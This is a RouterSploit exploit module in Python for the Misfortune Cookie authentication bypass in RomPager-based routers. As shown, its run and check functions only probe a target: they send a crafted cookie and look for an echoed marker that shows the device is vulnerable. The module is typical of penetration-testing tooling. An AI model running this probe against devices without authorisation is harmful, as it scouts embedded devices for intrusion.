import requests
import re

from routersploit import (
    exploits,
    print_success,
    print_error,
    sanitize_url,
)


class Exploit(exploits.Exploit):
    """
    Exploit implementation for Misfortune Cookie Authentication Bypass vulnerability.
    """
    __info__ = {
        'name': 'Misfortune Cookie',
        'description': 'Exploit implementation for Misfortune Cookie Authentication Bypass vulnerability.',
        'authors': [
            'Check Point <www.checkpoint.com>',  # vulnerability discovery
            'Jan Trencansky',  # proof of concept exploit
            'Marcin Bury <marcin.bury@reverse-shell.com>',  # routersploit module
        ],
        'references': [
            'http://mis.fortunecook.ie/'
        ],
        'targets': [
             'multi'
        ]
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
    port = exploits.Option(80, 'Target port')  # default port

    def run(self):
        if self.check():
            print_success("Device is vulnerable to Misfortune Cookie vulnerability")
        else:
            print_error("Device seems to be not vulnerable")

    def check(self):
        url = sanitize_url("{}:{}/test".format(self.target, self.port))
        user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
        headers = {'User-Agent': user_agent,
                   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                   'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
                   'Connection': 'keep-alive',
                   'Accept-Encoding': 'gzip, deflate',
                   'Cache-Control': 'no-cache',
                   'Cookie': 'C107373883=/omg1337hax'}

        try:
            r = requests.get(url, headers=headers)

            if r.status_code != 404:
                return False  # not rompage
            else:
                if 'server' in r.headers:
                    server = r.headers.get('server')

                    if re.search('RomPager', server) is not None:
                        if re.search('omg1337hax', r.text) is not None:
                            return True  # device is vulnerable
                        else:
                            return None  # might be still vulnerable but could not be verified
        except:
            return None  # could not be verified

        return False  # target not vulnerable
